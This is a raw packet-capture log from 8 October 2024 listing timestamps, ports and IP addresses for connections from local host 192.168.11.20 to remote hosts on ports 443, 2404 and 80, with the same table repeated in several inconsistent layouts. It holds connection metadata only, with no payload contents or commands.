Oct 8, 2024 16:52:24.955836058 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.955957890 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.955957890 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.955957890 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.955971956 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.956006050 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956006050 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956006050 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956007004 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956016064 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.956216097 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956216097 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.956216097 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.957180023 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.957468033 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.999651909 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:24.999861002 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:24.999861002 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:25.263592005 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.263597012 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.263756037 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.263760090 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:25.263760090 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:25.263808012 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:25.263816118 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.263945103 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.263953924 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
Oct 8, 2024 16:52:25.263962984 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.264041901 CEST | 443 | 49735 | 102.65.21.26 | 192.168.11.20
Oct 8, 2024 16:52:25.264096975 CEST | 49735 | 443 | 192.168.11.20 | 102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264096975 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264194965 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264194965 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264219046 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264292955 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.264421940 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.266467094 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.266732931 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.266733885 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.266733885 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.266733885 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.610874891 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.610878944 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.610963106 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611151934 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611177921 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611192942 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611207962 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611331940 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611371994 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611371994 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611371994 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611391068 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611462116 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611462116 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611462116 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611483097 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611639023 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611639023 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611639023 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611639023 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611659050 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611659050 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611659050 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611659050 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611659050 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611675978 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611704111 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611704111 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611809015 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611844063 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611844063 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611844063 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611946106 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611946106 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611994028 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.611994028 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.612042904 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877275944 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877363920 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877487898 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877487898 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877501011 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877536058 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877536058 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877634048 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.877708912 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879684925 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879841089 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879849911 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879905939 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879911900 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879983902 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.879983902 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880018950 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880027056 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880068064 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880072117 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880126953 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880168915 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880402088 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880415916 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:25.880554914 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185630083 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185688019 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185693026 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185959101 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185959101 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.185966969 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186007977 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186007977 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186007977 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186014891 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186105967 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186155081 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186203957 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186253071 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186253071 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186253071 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186301947 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186351061 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.186351061 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.220567942 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.220762014 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.220870018 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.487443924 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.487591982 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.487591982 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.487638950 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488183975 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488466024 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488590002 CEST44349735102.65.21.26192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488848925 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488848925 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488848925 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.488848925 CEST49735443192.168.11.20102.65.21.26
                                                                                                                                                                                  Oct 8, 2024 16:52:26.490222931 CEST44349735102.65.21.26192.168.11.20
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Oct 8, 2024 16:52:26.490374088 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.490422010 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.490422010 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.490469933 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.490469933 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.491070986 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.491260052 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.491455078 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.526566029 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.526709080 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.526825905 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794251919 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.794327021 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.794413090 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794414043 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794444084 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.794539928 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794554949 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.794605970 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794605970 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794653893 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.794753075 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795341015 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.795464993 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795464993 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795485020 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.795511007 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795559883 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795561075 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795578003 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.795696974 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.795773983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.796019077 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.796152115 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.796152115 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.796200037 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.796200037 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.796247959 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.831332922 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:26.831525087 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:26.831577063 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100037098 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.100418091 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.100450039 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100641966 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100641966 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100646019 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.100652933 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.100821972 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100872040 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.100872040 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101077080 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.101277113 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.101324081 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.101433992 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101433992 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101444960 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.101624012 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101624966 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101624966 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101624966 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.101816893 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.137017012 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.137348890 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.137348890 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.404973984 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.405222893 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.405240059 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405252934 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.405396938 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405396938 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405558109 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405747890 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.405896902 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.405941010 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405941010 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405941010 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.405957937 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406131983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406131983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406131983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406131983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406131983 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406200886 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406322002 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406331062 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406338930 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406390905 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406440973 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406440973 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406477928 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406488895 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406498909 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406542063 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406548977 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:27.406588078 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406686068 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.406735897 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.433444023 CEST  49735        443        192.168.11.20   102.65.21.26
Oct 8, 2024 16:52:27.433459044 CEST  443          49735      102.65.21.26    192.168.11.20
Oct 8, 2024 16:52:32.797046900 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:32.978802919 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:32.979821920 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:32.982353926 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:33.169873953 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:33.225373030 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:33.406913996 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:33.410934925 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:33.636425972 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:33.636802912 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:33.834685087 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:33.836785078 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.018630981 CEST  2404         49736      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.022588015 CEST  49737        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.024280071 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.068742990 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.085066080 CEST  49739        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.122750998 CEST  49740        80         192.168.11.20   178.237.33.50
Oct 8, 2024 16:52:34.204339027 CEST  2404         49737      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.204663038 CEST  49737        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.206116915 CEST  2404         49738      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.206300974 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.207498074 CEST  49737        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.211550951 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.268974066 CEST  2404         49739      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.269190073 CEST  49739        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.272006989 CEST  49739        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.292850018 CEST  80           49740      178.237.33.50   192.168.11.20
Oct 8, 2024 16:52:34.293209076 CEST  49740        80         192.168.11.20   178.237.33.50
Oct 8, 2024 16:52:34.293272018 CEST  49740        80         192.168.11.20   178.237.33.50
Oct 8, 2024 16:52:34.395855904 CEST  2404         49737      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.408802032 CEST  2404         49738      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.443607092 CEST  49737        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.459283113 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.462516069 CEST  2404         49739      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.468440056 CEST  80           49740      178.237.33.50   192.168.11.20
Oct 8, 2024 16:52:34.468674898 CEST  49740        80         192.168.11.20   178.237.33.50
Oct 8, 2024 16:52:34.505445957 CEST  49736        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.506108999 CEST  49739        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.625114918 CEST  2404         49737      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.629096985 CEST  49737        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.643439054 CEST  2404         49738      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.647332907 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.650417089 CEST  49738        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.689718962 CEST  2404         49739      41.216.188.178  192.168.11.20
Oct 8, 2024 16:52:34.693624973 CEST  49739        2404       192.168.11.20   41.216.188.178
Oct 8, 2024 16:52:34.698198080 CEST  49739        2404       192.168.11.20   41.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.743082047 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.832093954 CEST24044973841.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.841129065 CEST24044973841.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.841471910 CEST497382404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.867578983 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.867834091 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882332087 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882397890 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882474899 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882540941 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882576942 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882577896 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882771015 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882853985 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.056570053 CEST24044973741.216.188.178192.168.11.20
